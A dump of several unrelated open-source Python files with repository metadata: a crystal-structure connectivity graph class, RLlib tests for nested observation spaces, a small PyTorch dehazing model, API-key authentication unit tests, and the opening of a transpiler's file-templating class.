environments_symbols: Symbols of the environments for the environment subgraph.
only_atoms: Atoms to be considered.
"""
logging.info('Setup of environment subgraph for environments {}'.format(', '.join(environments_symbols)))
if not isinstance(environments_symbols, collections.abc.Iterable):
environments_symbols = [environments_symbols]
environments_symbols = sorted(environments_symbols)
envs_string = '-'.join(environments_symbols)
if only_atoms is not None:
envs_string += '#' + '-'.join(sorted(only_atoms))
# Get it directly if it was already computed
if envs_string in self.environment_subgraphs:
self._environment_subgraph = self.environment_subgraphs[envs_string]
return
# Initialize graph for a subset of environments
self._environment_subgraph = nx.MultiGraph()
# Add the sites with the required environment(s)
for isite, ce_this_site_all in enumerate(self.light_structure_environments.coordination_environments):
if ce_this_site_all is None:
continue
if len(ce_this_site_all) == 0:
continue
ce_this_site = ce_this_site_all[0]['ce_symbol']
if ce_this_site in environments_symbols:
if only_atoms is None:
env_node = get_environment_node(self.light_structure_environments.structure[isite], isite,
ce_this_site)
self._environment_subgraph.add_node(env_node)
else:
if self.light_structure_environments.structure.is_ordered:
if self.light_structure_environments.structure[isite].specie.symbol in only_atoms:
env_node = get_environment_node(self.light_structure_environments.structure[isite], isite,
ce_this_site)
self._environment_subgraph.add_node(env_node)
else:
# TODO: add the possibility of a "constraint" on the minimum percentage
# of the atoms on the site
this_site_elements = [sp.symbol for sp in
self.light_structure_environments.structure[isite].species_and_occu]
for elem_symbol in this_site_elements:
if elem_symbol in only_atoms:
env_node = get_environment_node(self.light_structure_environments.structure[isite],
isite, ce_this_site)
self._environment_subgraph.add_node(env_node)
break
# Find the connections between the environments
nodes = list(self._environment_subgraph.nodes())
for inode1, node1 in enumerate(nodes):
isite1 = node1.isite
links_node1 = self._graph.edges(isite1, data=True)
for inode2, node2 in enumerate(nodes[inode1:]):
isite2 = node2.isite
links_node2 = self._graph.edges(isite2, data=True)
# We look for ligands that are common to both site1 and site2
connections_site1_site2 = {}
for (site1_1, ilig_site1, d1) in links_node1:
for (site2_1, ilig_site2, d2) in links_node2:
if ilig_site1 == ilig_site2:
delta_image = get_delta_image(isite1, isite2, d1, d2)
if isite1 == isite2 and np.all(delta_image == 0):
continue
tuple_delta_image = tuple(delta_image)
if tuple_delta_image in connections_site1_site2:
connections_site1_site2[tuple_delta_image].append((ilig_site1, d1, d2))
else:
connections_site1_site2[tuple_delta_image] = [(ilig_site1, d1, d2)]
# Remove the double self-loops ...
if isite1 == isite2:
remove_deltas = []
alldeltas = list(connections_site1_site2.keys())
alldeltas2 = list(connections_site1_site2.keys())
if (0, 0, 0) in alldeltas:
alldeltas.remove((0, 0, 0))
alldeltas2.remove((0, 0, 0))
for current_delta in alldeltas:
opp_current_delta = tuple([-dd for dd in current_delta])
if opp_current_delta in alldeltas2:
remove_deltas.append(current_delta)
alldeltas2.remove(current_delta)
alldeltas2.remove(opp_current_delta)
for remove_delta in remove_deltas:
connections_site1_site2.pop(remove_delta)
# Add all the edges
for conn, ligands in list(connections_site1_site2.items()):
self._environment_subgraph.add_edge(node1, node2, start=node1.isite, end=node2.isite,
delta=conn, ligands=ligands)
self.environment_subgraphs[envs_string] = self._environment_subgraph
def setup_connectivity_description(self):
pass
def get_connected_components(self, environments_symbols=None, only_atoms=None):
connected_components = []
env_subgraph = self.environment_subgraph(environments_symbols=environments_symbols, only_atoms=only_atoms)
for component_nodes in nx.connected_components(env_subgraph):
graph = env_subgraph.subgraph(component_nodes).copy()
connected_components.append(ConnectedComponent.from_graph(graph))
return connected_components
def setup_atom_environment_subgraph(self, atom_environment):
raise NotImplementedError()
def setup_environments_subgraph(self, environments_symbols):
raise NotImplementedError()
def setup_atom_environments_subgraph(self, atoms_environments):
raise NotImplementedError()
def print_links(self):
nodes = self.environment_subgraph().nodes()
print('Links in graph :')
for node in nodes:
print(node.isite, ' is connected with : ')
for (n1, n2, data) in self.environment_subgraph().edges(node, data=True):
if n1.isite == data['start']:
print(' - {:d} by {:d} ligands ({:d} {:d} {:d})'.format(n2.isite, len(data['ligands']),
data['delta'][0], data['delta'][1],
data['delta'][2]))
else:
print(' - {:d} by {:d} ligands ({:d} {:d} {:d})'.format(n2.isite, len(data['ligands']),
-data['delta'][0], -data['delta'][1],
-data['delta'][2]))
def as_dict(self):
return {"@module": self.__class__.__module__,
"@class": self.__class__.__name__,
"light_structure_environments": self.light_structure_environments.as_dict(),
"connectivity_graph": jsanitize(nx.to_dict_of_dicts(self._graph)),
"environment_subgraphs": {env_key: jsanitize(nx.to_dict_of_dicts(subgraph))
for env_key, subgraph in self.environment_subgraphs.items()}}
@classmethod
def from_dict(cls, d):
# Reconstructs the graph with integer as nodes (json's as_dict replaces integer keys with str keys)
cgraph = nx.from_dict_of_dicts(d['connectivity_graph'], create_using=nx.MultiGraph, multigraph_input=True)
cgraph = nx.relabel_nodes(cgraph, int) # Just relabel the nodes using integer casting (maps str->int)
# Relabel multiedges (removes multiedges with str keys and adds them back with int keys)
edges = set(cgraph.edges())
for n1, n2 in edges:
new_edges = {int(iedge): edata for iedge, edata in cgraph[n1][n2].items()}
cgraph.remove_edges_from([(n1, n2, iedge) for iedge, edata in cgraph[n1][n2].items()])
cgraph.add_edges_from([(n1, n2, iedge, edata) for iedge, edata in new_edges.items()])
return cls(LightStructureEnvironments.from_dict(d['light_structure_environments']),
connectivity_graph=cgraph,
environment_subgraphs=None)
# TODO: also deserialize the environment_subgraphs
# environment_subgraphs={env_key: nx.from_dict_of_dicts(subgraph, multigraph_input=True)
# for env_key, subgraph in d['environment_subgraphs'].items()})
| 54.028674
| 119
| 0.577882
|
89b7ab7be2ab6dc8a6e46aa77f00aeb4cdc80072
| 21,953
|
py
|
Python
|
rllib/tests/test_nested_observation_spaces.py
|
mgelbart/ray
|
4cec2286572e368a4bd64aae467751a384eff62d
|
[
"Apache-2.0"
] | 22
|
2018-05-08T05:52:34.000Z
|
2020-04-01T10:09:55.000Z
|
rllib/tests/test_nested_observation_spaces.py
|
mgelbart/ray
|
4cec2286572e368a4bd64aae467751a384eff62d
|
[
"Apache-2.0"
] | 53
|
2021-10-06T20:08:04.000Z
|
2022-03-21T20:17:25.000Z
|
rllib/tests/test_nested_observation_spaces.py
|
mgelbart/ray
|
4cec2286572e368a4bd64aae467751a384eff62d
|
[
"Apache-2.0"
] | 10
|
2018-04-27T10:50:59.000Z
|
2020-02-24T02:41:43.000Z
|
from gym import spaces
from gym.envs.registration import EnvSpec
import gym
import numpy as np
import pickle
import unittest
import ray
from ray.rllib.agents.a3c import A2CTrainer
from ray.rllib.agents.pg import PGTrainer
from ray.rllib.env import MultiAgentEnv
from ray.rllib.env.base_env import convert_to_base_env
from ray.rllib.env.vector_env import VectorEnv
from ray.rllib.models import ModelCatalog
from ray.rllib.models.tf.tf_modelv2 import TFModelV2
from ray.rllib.models.torch.fcnet import FullyConnectedNetwork
from ray.rllib.models.torch.torch_modelv2 import TorchModelV2
from ray.rllib.evaluate import rollout
from ray.rllib.tests.test_external_env import SimpleServing
from ray.tune.registry import register_env
from ray.rllib.utils.framework import try_import_tf, try_import_torch
from ray.rllib.utils.numpy import one_hot
from ray.rllib.utils.spaces.repeated import Repeated
from ray.rllib.utils.test_utils import check
tf1, tf, tfv = try_import_tf()
_, nn = try_import_torch()
DICT_SPACE = spaces.Dict(
{
"sensors": spaces.Dict(
{
"position": spaces.Box(low=-100, high=100, shape=(3,)),
"velocity": spaces.Box(low=-1, high=1, shape=(3,)),
"front_cam": spaces.Tuple(
(
spaces.Box(low=0, high=1, shape=(10, 10, 3)),
spaces.Box(low=0, high=1, shape=(10, 10, 3)),
)
),
"rear_cam": spaces.Box(low=0, high=1, shape=(10, 10, 3)),
}
),
"inner_state": spaces.Dict(
{
"charge": spaces.Discrete(100),
"job_status": spaces.Dict(
{
"task": spaces.Discrete(5),
"progress": spaces.Box(low=0, high=100, shape=()),
}
),
}
),
}
)
DICT_SAMPLES = [DICT_SPACE.sample() for _ in range(10)]
TUPLE_SPACE = spaces.Tuple(
[
spaces.Box(low=-100, high=100, shape=(3,)),
spaces.Tuple(
(
spaces.Box(low=0, high=1, shape=(10, 10, 3)),
spaces.Box(low=0, high=1, shape=(10, 10, 3)),
)
),
spaces.Discrete(5),
]
)
TUPLE_SAMPLES = [TUPLE_SPACE.sample() for _ in range(10)]
# Constraints on the Repeated space.
MAX_PLAYERS = 4
MAX_ITEMS = 7
MAX_EFFECTS = 2
ITEM_SPACE = spaces.Box(-5, 5, shape=(1,))
EFFECT_SPACE = spaces.Box(9000, 9999, shape=(4,))
PLAYER_SPACE = spaces.Dict(
{
"location": spaces.Box(-100, 100, shape=(2,)),
"items": Repeated(ITEM_SPACE, max_len=MAX_ITEMS),
"effects": Repeated(EFFECT_SPACE, max_len=MAX_EFFECTS),
"status": spaces.Box(-1, 1, shape=(10,)),
}
)
REPEATED_SPACE = Repeated(PLAYER_SPACE, max_len=MAX_PLAYERS)
REPEATED_SAMPLES = [REPEATED_SPACE.sample() for _ in range(10)]
class NestedDictEnv(gym.Env):
def __init__(self):
self.action_space = spaces.Discrete(2)
self.observation_space = DICT_SPACE
self._spec = EnvSpec("NestedDictEnv-v0")
self.steps = 0
def reset(self):
self.steps = 0
return DICT_SAMPLES[0]
def step(self, action):
self.steps += 1
return DICT_SAMPLES[self.steps], 1, self.steps >= 5, {}
class NestedTupleEnv(gym.Env):
def __init__(self):
self.action_space = spaces.Discrete(2)
self.observation_space = TUPLE_SPACE
self._spec = EnvSpec("NestedTupleEnv-v0")
self.steps = 0
def reset(self):
self.steps = 0
return TUPLE_SAMPLES[0]
def step(self, action):
self.steps += 1
return TUPLE_SAMPLES[self.steps], 1, self.steps >= 5, {}
class RepeatedSpaceEnv(gym.Env):
def __init__(self):
self.action_space = spaces.Discrete(2)
self.observation_space = REPEATED_SPACE
self._spec = EnvSpec("RepeatedSpaceEnv-v0")
self.steps = 0
def reset(self):
self.steps = 0
return REPEATED_SAMPLES[0]
def step(self, action):
self.steps += 1
return REPEATED_SAMPLES[self.steps], 1, self.steps >= 5, {}
class NestedMultiAgentEnv(MultiAgentEnv):
def __init__(self):
super().__init__()
self.observation_space = spaces.Dict(
{"dict_agent": DICT_SPACE, "tuple_agent": TUPLE_SPACE}
)
self.action_space = spaces.Dict(
{"dict_agent": spaces.Discrete(1), "tuple_agent": spaces.Discrete(1)}
)
self._agent_ids = {"dict_agent", "tuple_agent"}
self.steps = 0
def reset(self):
return {
"dict_agent": DICT_SAMPLES[0],
"tuple_agent": TUPLE_SAMPLES[0],
}
def step(self, actions):
self.steps += 1
obs = {
"dict_agent": DICT_SAMPLES[self.steps],
"tuple_agent": TUPLE_SAMPLES[self.steps],
}
rew = {
"dict_agent": 0,
"tuple_agent": 0,
}
dones = {"__all__": self.steps >= 5}
infos = {
"dict_agent": {},
"tuple_agent": {},
}
return obs, rew, dones, infos
class InvalidModel(TorchModelV2):
def forward(self, input_dict, state, seq_lens):
return "not", "valid"
class InvalidModel2(TFModelV2):
def forward(self, input_dict, state, seq_lens):
return tf.constant(0), tf.constant(0)
class TorchSpyModel(TorchModelV2, nn.Module):
capture_index = 0
def __init__(self, obs_space, action_space, num_outputs, model_config, name):
TorchModelV2.__init__(
self, obs_space, action_space, num_outputs, model_config, name
)
nn.Module.__init__(self)
self.fc = FullyConnectedNetwork(
obs_space.original_space["sensors"].spaces["position"],
action_space,
num_outputs,
model_config,
name,
)
def forward(self, input_dict, state, seq_lens):
pos = input_dict["obs"]["sensors"]["position"].detach().cpu().numpy()
front_cam = input_dict["obs"]["sensors"]["front_cam"][0].detach().cpu().numpy()
task = (
input_dict["obs"]["inner_state"]["job_status"]["task"]
.detach()
.cpu()
.numpy()
)
ray.experimental.internal_kv._internal_kv_put(
"torch_spy_in_{}".format(TorchSpyModel.capture_index),
pickle.dumps((pos, front_cam, task)),
overwrite=True,
)
TorchSpyModel.capture_index += 1
return self.fc(
{"obs": input_dict["obs"]["sensors"]["position"]}, state, seq_lens
)
def value_function(self):
return self.fc.value_function()
class TorchRepeatedSpyModel(TorchModelV2, nn.Module):
capture_index = 0
def __init__(self, obs_space, action_space, num_outputs, model_config, name):
TorchModelV2.__init__(
self, obs_space, action_space, num_outputs, model_config, name
)
nn.Module.__init__(self)
self.fc = FullyConnectedNetwork(
obs_space.original_space.child_space["location"],
action_space,
num_outputs,
model_config,
name,
)
def forward(self, input_dict, state, seq_lens):
ray.experimental.internal_kv._internal_kv_put(
"torch_rspy_in_{}".format(TorchRepeatedSpyModel.capture_index),
pickle.dumps(input_dict["obs"].unbatch_all()),
overwrite=True,
)
TorchRepeatedSpyModel.capture_index += 1
return self.fc(
{"obs": input_dict["obs"].values["location"][:, 0]}, state, seq_lens
)
def value_function(self):
return self.fc.value_function()
def to_list(value):
if isinstance(value, list):
return [to_list(x) for x in value]
elif isinstance(value, dict):
return {k: to_list(v) for k, v in value.items()}
elif isinstance(value, np.ndarray):
return value.tolist()
elif isinstance(value, int):
return value
else:
return value.detach().cpu().numpy().tolist()
class DictSpyModel(TFModelV2):
capture_index = 0
def __init__(self, obs_space, action_space, num_outputs, model_config, name):
super().__init__(obs_space, action_space, None, model_config, name)
# Will only feed in sensors->pos.
input_ = tf.keras.layers.Input(
shape=self.obs_space["sensors"]["position"].shape
)
self.num_outputs = num_outputs or 64
out = tf.keras.layers.Dense(self.num_outputs)(input_)
self._main_layer = tf.keras.models.Model([input_], [out])
def forward(self, input_dict, state, seq_lens):
def spy(pos, front_cam, task):
# TF runs this function in an isolated context, so we have to use
# redis to communicate back to our suite
ray.experimental.internal_kv._internal_kv_put(
"d_spy_in_{}".format(DictSpyModel.capture_index),
pickle.dumps((pos, front_cam, task)),
overwrite=True,
)
DictSpyModel.capture_index += 1
return np.array(0, dtype=np.int64)
spy_fn = tf1.py_func(
spy,
[
input_dict["obs"]["sensors"]["position"],
input_dict["obs"]["sensors"]["front_cam"][0],
input_dict["obs"]["inner_state"]["job_status"]["task"],
],
tf.int64,
stateful=True,
)
with tf1.control_dependencies([spy_fn]):
output = self._main_layer([input_dict["obs"]["sensors"]["position"]])
return output, []
class TupleSpyModel(TFModelV2):
capture_index = 0
def __init__(self, obs_space, action_space, num_outputs, model_config, name):
super().__init__(obs_space, action_space, None, model_config, name)
# Will only feed in 0th index of observation Tuple space.
input_ = tf.keras.layers.Input(shape=self.obs_space[0].shape)
self.num_outputs = num_outputs or 64
out = tf.keras.layers.Dense(self.num_outputs)(input_)
self._main_layer = tf.keras.models.Model([input_], [out])
def forward(self, input_dict, state, seq_lens):
def spy(pos, cam, task):
# TF runs this function in an isolated context, so we have to use
# redis to communicate back to our suite
ray.experimental.internal_kv._internal_kv_put(
"t_spy_in_{}".format(TupleSpyModel.capture_index),
pickle.dumps((pos, cam, task)),
overwrite=True,
)
TupleSpyModel.capture_index += 1
return np.array(0, dtype=np.int64)
spy_fn = tf1.py_func(
spy,
[
input_dict["obs"][0],
input_dict["obs"][1][0],
input_dict["obs"][2],
],
tf.int64,
stateful=True,
)
with tf1.control_dependencies([spy_fn]):
output = tf1.layers.dense(input_dict["obs"][0], self.num_outputs)
return output, []
class NestedObservationSpacesTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
ray.init(num_cpus=5)
@classmethod
def tearDownClass(cls):
ray.shutdown()
def test_invalid_model(self):
ModelCatalog.register_custom_model("invalid", InvalidModel)
self.assertRaisesRegex(
ValueError,
"Subclasses of TorchModelV2 must also inherit from nn.Module",
lambda: PGTrainer(
env="CartPole-v0",
config={
"model": {
"custom_model": "invalid",
},
"framework": "torch",
},
),
)
def test_invalid_model2(self):
ModelCatalog.register_custom_model("invalid2", InvalidModel2)
self.assertRaisesRegex(
ValueError,
"State output is not a list",
lambda: PGTrainer(
env="CartPole-v0",
config={
"model": {
"custom_model": "invalid2",
},
"framework": "tf",
},
),
)
def do_test_nested_dict(self, make_env, test_lstm=False):
ModelCatalog.register_custom_model("composite", DictSpyModel)
register_env("nested", make_env)
pg = PGTrainer(
env="nested",
config={
"num_workers": 0,
"rollout_fragment_length": 5,
"train_batch_size": 5,
"model": {
"custom_model": "composite",
"use_lstm": test_lstm,
},
"framework": "tf",
"disable_env_checking": True,
},
)
# Skip first passes as they came from the TorchPolicy loss
# initialization.
DictSpyModel.capture_index = 0
pg.train()
# Check that the model sees the correct reconstructed observations
for i in range(4):
seen = pickle.loads(
ray.experimental.internal_kv._internal_kv_get("d_spy_in_{}".format(i))
)
pos_i = DICT_SAMPLES[i]["sensors"]["position"].tolist()
cam_i = DICT_SAMPLES[i]["sensors"]["front_cam"][0].tolist()
task_i = DICT_SAMPLES[i]["inner_state"]["job_status"]["task"]
self.assertEqual(seen[0][0].tolist(), pos_i)
self.assertEqual(seen[1][0].tolist(), cam_i)
check(seen[2][0], task_i)
def do_test_nested_tuple(self, make_env):
ModelCatalog.register_custom_model("composite2", TupleSpyModel)
register_env("nested2", make_env)
pg = PGTrainer(
env="nested2",
config={
"num_workers": 0,
"rollout_fragment_length": 5,
"train_batch_size": 5,
"model": {
"custom_model": "composite2",
},
"framework": "tf",
"disable_env_checking": True,
},
)
# Skip first passes as they came from the TorchPolicy loss
# initialization.
TupleSpyModel.capture_index = 0
pg.train()
# Check that the model sees the correct reconstructed observations
for i in range(4):
seen = pickle.loads(
ray.experimental.internal_kv._internal_kv_get("t_spy_in_{}".format(i))
)
pos_i = TUPLE_SAMPLES[i][0].tolist()
cam_i = TUPLE_SAMPLES[i][1][0].tolist()
task_i = TUPLE_SAMPLES[i][2]
self.assertEqual(seen[0][0].tolist(), pos_i)
self.assertEqual(seen[1][0].tolist(), cam_i)
check(seen[2][0], task_i)
def test_nested_dict_gym(self):
self.do_test_nested_dict(lambda _: NestedDictEnv())
def test_nested_dict_gym_lstm(self):
self.do_test_nested_dict(lambda _: NestedDictEnv(), test_lstm=True)
def test_nested_dict_vector(self):
self.do_test_nested_dict(
lambda _: VectorEnv.vectorize_gym_envs(lambda i: NestedDictEnv())
)
def test_nested_dict_serving(self):
self.do_test_nested_dict(lambda _: SimpleServing(NestedDictEnv()))
def test_nested_dict_async(self):
self.do_test_nested_dict(lambda _: convert_to_base_env(NestedDictEnv()))
def test_nested_tuple_gym(self):
self.do_test_nested_tuple(lambda _: NestedTupleEnv())
def test_nested_tuple_vector(self):
self.do_test_nested_tuple(
lambda _: VectorEnv.vectorize_gym_envs(lambda i: NestedTupleEnv())
)
def test_nested_tuple_serving(self):
self.do_test_nested_tuple(lambda _: SimpleServing(NestedTupleEnv()))
def test_nested_tuple_async(self):
self.do_test_nested_tuple(lambda _: convert_to_base_env(NestedTupleEnv()))
def test_multi_agent_complex_spaces(self):
ModelCatalog.register_custom_model("dict_spy", DictSpyModel)
ModelCatalog.register_custom_model("tuple_spy", TupleSpyModel)
register_env("nested_ma", lambda _: NestedMultiAgentEnv())
act_space = spaces.Discrete(2)
pg = PGTrainer(
env="nested_ma",
config={
"num_workers": 0,
"rollout_fragment_length": 5,
"train_batch_size": 5,
"multiagent": {
"policies": {
"tuple_policy": (
None,
TUPLE_SPACE,
act_space,
{"model": {"custom_model": "tuple_spy"}},
),
"dict_policy": (
None,
DICT_SPACE,
act_space,
{"model": {"custom_model": "dict_spy"}},
),
},
"policy_mapping_fn": lambda aid, **kwargs: {
"tuple_agent": "tuple_policy",
"dict_agent": "dict_policy",
}[aid],
},
"framework": "tf",
"disable_env_checking": True,
},
)
# Skip first passes as they came from the TorchPolicy loss
# initialization.
TupleSpyModel.capture_index = DictSpyModel.capture_index = 0
pg.train()
for i in range(4):
seen = pickle.loads(
ray.experimental.internal_kv._internal_kv_get("d_spy_in_{}".format(i))
)
pos_i = DICT_SAMPLES[i]["sensors"]["position"].tolist()
cam_i = DICT_SAMPLES[i]["sensors"]["front_cam"][0].tolist()
task_i = DICT_SAMPLES[i]["inner_state"]["job_status"]["task"]
self.assertEqual(seen[0][0].tolist(), pos_i)
self.assertEqual(seen[1][0].tolist(), cam_i)
check(seen[2][0], task_i)
for i in range(4):
seen = pickle.loads(
ray.experimental.internal_kv._internal_kv_get("t_spy_in_{}".format(i))
)
pos_i = TUPLE_SAMPLES[i][0].tolist()
cam_i = TUPLE_SAMPLES[i][1][0].tolist()
task_i = TUPLE_SAMPLES[i][2]
self.assertEqual(seen[0][0].tolist(), pos_i)
self.assertEqual(seen[1][0].tolist(), cam_i)
check(seen[2][0], task_i)
def test_rollout_dict_space(self):
register_env("nested", lambda _: NestedDictEnv())
agent = PGTrainer(env="nested", config={"framework": "tf"})
agent.train()
path = agent.save()
agent.stop()
# Test train works on restore
agent2 = PGTrainer(env="nested", config={"framework": "tf"})
agent2.restore(path)
agent2.train()
# Test rollout works on restore
rollout(agent2, "nested", 100)
def test_py_torch_model(self):
ModelCatalog.register_custom_model("composite", TorchSpyModel)
register_env("nested", lambda _: NestedDictEnv())
a2c = A2CTrainer(
env="nested",
config={
"num_workers": 0,
"rollout_fragment_length": 5,
"train_batch_size": 5,
"model": {
"custom_model": "composite",
},
"framework": "torch",
},
)
# Skip first passes as they came from the TorchPolicy loss
# initialization.
TorchSpyModel.capture_index = 0
a2c.train()
# Check that the model sees the correct reconstructed observations
for i in range(4):
seen = pickle.loads(
ray.experimental.internal_kv._internal_kv_get(
"torch_spy_in_{}".format(i)
)
)
pos_i = DICT_SAMPLES[i]["sensors"]["position"].tolist()
cam_i = DICT_SAMPLES[i]["sensors"]["front_cam"][0].tolist()
task_i = one_hot(DICT_SAMPLES[i]["inner_state"]["job_status"]["task"], 5)
# Only look at the last entry (-1) in `seen` as we reset (re-use)
# the ray-kv indices before training.
self.assertEqual(seen[0][-1].tolist(), pos_i)
self.assertEqual(seen[1][-1].tolist(), cam_i)
check(seen[2][-1], task_i)
# TODO(ekl) should probably also add a test for TF/eager
def test_torch_repeated(self):
ModelCatalog.register_custom_model("r1", TorchRepeatedSpyModel)
register_env("repeat", lambda _: RepeatedSpaceEnv())
a2c = A2CTrainer(
env="repeat",
config={
"num_workers": 0,
"rollout_fragment_length": 5,
"train_batch_size": 5,
"model": {
"custom_model": "r1",
},
"framework": "torch",
},
)
# Skip first passes as they came from the TorchPolicy loss
# initialization.
TorchRepeatedSpyModel.capture_index = 0
a2c.train()
# Check that the model sees the correct reconstructed observations
for i in range(4):
seen = pickle.loads(
ray.experimental.internal_kv._internal_kv_get(
"torch_rspy_in_{}".format(i)
)
)
# Only look at the last entry (-1) in `seen` as we reset (re-use)
# the ray-kv indices before training.
self.assertEqual(to_list(seen[:][-1]), to_list(REPEATED_SAMPLES[i]))
if __name__ == "__main__":
import pytest
import sys
sys.exit(pytest.main(["-v", __file__]))
| 33.982972
| 87
| 0.561518
|
fd8b0c101865fd458201a67da28e04beb4c24234
| 1,792
|
py
|
Python
|
model/AtmLocal.py
|
perseveranceLX/iterative-dehaze
|
dc5d56b2bf86460fff9d478e68368d2fffe78ba4
|
[
"MIT"
] | 1
|
2022-02-12T13:04:08.000Z
|
2022-02-12T13:04:08.000Z
|
model/AtmLocal.py
|
perseveranceLX/iterative-dehaze
|
dc5d56b2bf86460fff9d478e68368d2fffe78ba4
|
[
"MIT"
] | null | null | null |
model/AtmLocal.py
|
perseveranceLX/iterative-dehaze
|
dc5d56b2bf86460fff9d478e68368d2fffe78ba4
|
[
"MIT"
] | null | null | null |
import torch
import torch.nn as nn
import torch.nn.functional as F
def make_model():
return AtmLocal()
class DoubleConv(nn.Module):
def __init__(self, in_ch, out_ch):
super(DoubleConv, self).__init__()
self.conv = nn.Sequential(
nn.Conv2d(in_ch, out_ch, 3, padding=1),
nn.GroupNorm(4, out_ch),
nn.ReLU(),
nn.Conv2d(out_ch, out_ch, 3, padding=1),
nn.GroupNorm(4, out_ch),
nn.ReLU()
)
def forward(self, x):
x = self.conv(x)
return x
class InConv(nn.Module):
def __init__(self, in_ch, out_ch):
super(InConv, self).__init__()
self.conv = DoubleConv(in_ch, out_ch)
def forward(self, x):
x = self.conv(x)
return x
class DownConv(nn.Module):
def __init__(self, in_ch, out_ch):
super(DownConv, self).__init__()
self.mpconv = nn.Sequential(
nn.MaxPool2d(kernel_size=7, stride=2, padding=1),
DoubleConv(in_ch, out_ch)
)
def forward(self, x):
x = self.mpconv(x)
return x
class AtmLocal(nn.Module):
def __init__(self, n_channels=3, out_channels=3):
super(AtmLocal, self).__init__()
self.inc = InConv(n_channels, 64)
self.down1 = DownConv(64, 128)
self.down2 = DownConv(128, 128)
self.down3 = DownConv(128, 256)
self.down4 = DownConv(256, 256)
self.pool = nn.AdaptiveMaxPool2d(1)
self.dense = nn.Linear(256, out_channels)
def forward(self, x):
x = self.inc(x)
x = self.down1(x)
x = self.down2(x)
x = self.down3(x)
x = self.down4(x)
x = self.pool(x)
x = x.view(-1, 256)
x = self.dense(x)
return torch.sigmoid(x)
| 28.903226
| 61
| 0.563058
|
327df298c58bff808fe1e9accdaf480c2404b631
| 4,261
|
py
|
Python
|
tests/unit/test_auth.py
|
danofsatx/resources_api
|
664532ee3ab4cb7c5000166d84ba371cf8b7713a
|
[
"MIT"
] | null | null | null |
tests/unit/test_auth.py
|
danofsatx/resources_api
|
664532ee3ab4cb7c5000166d84ba371cf8b7713a
|
[
"MIT"
] | null | null | null |
tests/unit/test_auth.py
|
danofsatx/resources_api
|
664532ee3ab4cb7c5000166d84ba371cf8b7713a
|
[
"MIT"
] | 1
|
2019-02-11T20:04:50.000Z
|
2019-02-11T20:04:50.000Z
|
from unittest.mock import patch
from app.api.auth import (ApiKeyError, ApiKeyErrorCode, authenticate,
blacklist_key, find_key_by_apikey_or_email,
rotate_key)
from app.models import Key
from flask import g
FAKE_EMAIL = 'test@example.org'
FAKE_APIKEY = 'abcdef1234567890'
def create_fake_key(session, **kwargs):
kwargs['email'] = kwargs.get('email', FAKE_EMAIL)
kwargs['apikey'] = kwargs.get('apikey', FAKE_APIKEY)
key = Key(**kwargs)
session.add(key)
session.commit()
return key
def test_authenticate_failure(module_client, function_empty_db):
# Arrange
def callback(*args, **kwargs):
return 1
# Act
wrapper = authenticate(callback)
with patch('app.api.auth.request') as fake_request:
fake_request.headers = {
'x-apikey': FAKE_APIKEY
}
result = wrapper()
# Assert
assert result[1] == 401
def test_authenticate_success(module_client, function_empty_db):
# Arrange
key = create_fake_key(function_empty_db.session)
def callback(*args, **kwargs):
return 1
# Act
wrapper = authenticate(callback)
with patch('app.api.auth.request') as fake_request:
fake_request.headers = {
'x-apikey': FAKE_APIKEY
}
result = wrapper()
# Assert
assert result == 1
assert g.auth_key == key
def test_authenticate_blacklisted(module_client, function_empty_db):
# Arrange
create_fake_key(function_empty_db.session, blacklisted=True)
def callback(*args, **kwargs):
return 1
# Act
wrapper = authenticate(callback)
with patch('app.api.auth.request') as fake_request:
fake_request.headers = {
'x-apikey': FAKE_APIKEY
}
result = wrapper()
# Assert
assert result[1] == 401
def test_find_key_by_apikey_or_email(module_client, function_empty_db):
# Arrange
key = create_fake_key(function_empty_db.session)
# Act
key1 = find_key_by_apikey_or_email(FAKE_EMAIL)
key2 = find_key_by_apikey_or_email(FAKE_APIKEY)
# Assert
assert key == key1
assert key == key2
def test_blacklist_key_not_found(module_client, function_empty_db):
# Arrange
error = None
# Act
try:
blacklist_key(FAKE_APIKEY + 'b', True, function_empty_db.session)
except ApiKeyError as e:
error = e
# Assert
assert error.error_code == ApiKeyErrorCode.NOT_FOUND
def test_blacklist_key_already_blacklisted(module_client, function_empty_db):
# Arrange
error = None
key1 = None
create_fake_key(function_empty_db.session, blacklisted=True)
# Act
try:
key1 = blacklist_key(FAKE_APIKEY, True, function_empty_db.session)
except ApiKeyError as e:
error = e
# Assert
assert error.error_code == ApiKeyErrorCode.ALREADY_BLACKLISTED
assert key1 is None
def test_blacklist_key_not_blacklisted(module_client, function_empty_db):
# Arrange
error = None
key1 = None
create_fake_key(function_empty_db.session)
# Act
try:
key1 = blacklist_key(FAKE_APIKEY, False, function_empty_db.session)
except ApiKeyError as e:
error = e
# Assert
assert error.error_code == ApiKeyErrorCode.NOT_BLACKLISTED
assert key1 is None
def test_blacklist_key_set_blacklisted_on(module_client, function_empty_db):
# Arrange
key = create_fake_key(function_empty_db.session)
# Act
key1 = blacklist_key(FAKE_APIKEY, True, function_empty_db.session)
# Assert
assert key.blacklisted
assert key == key1
def test_blacklist_key_set_blacklisted_off(module_client, function_empty_db):
# Arrange
key = create_fake_key(function_empty_db.session, blacklisted=True)
# Act
key1 = blacklist_key(FAKE_APIKEY, False, function_empty_db.session)
# Assert
assert not key.blacklisted
assert key == key1
def test_rotate_key(module_client, function_empty_db):
# Arrange
key = create_fake_key(function_empty_db.session)
function_empty_db.session.add(key)
function_empty_db.session.commit()
# Act
rotate_key(key, function_empty_db.session)
# Assert
assert key.apikey != FAKE_APIKEY
| 24.488506
| 77
| 0.687397
|
ed561c25178db103ab458e58e2303f5d6ad6dda0
| 4,725
|
py
|
Python
|
third_party/lemonscript_transpiler/objects/file.py
|
hansonl02/frc-robot-code
|
4b120c917a7709df9f010c9089a87c320bab3a16
|
[
"MIT"
] | 61
|
2017-01-22T04:38:32.000Z
|
2022-03-07T00:04:37.000Z
|
third_party/lemonscript_transpiler/objects/file.py
|
hansonl02/frc-robot-code
|
4b120c917a7709df9f010c9089a87c320bab3a16
|
[
"MIT"
] | 10
|
2016-05-20T00:11:33.000Z
|
2017-02-13T01:43:09.000Z
|
third_party/lemonscript_transpiler/objects/file.py
|
hansonl02/frc-robot-code
|
4b120c917a7709df9f010c9089a87c320bab3a16
|
[
"MIT"
] | 17
|
2017-05-12T15:32:03.000Z
|
2021-12-09T12:49:38.000Z
|
import re
from .logger import Logger
class File(object):
"""
This class represents a file that can have parts of it replaced with text
or another file.
"Tags" in the file are represented by strings enclosed in pairs of 3 angle
brackets. For example:
file.txt:
---
My favorite animal is <<<animal>>>.
<<<this is a tag>>>
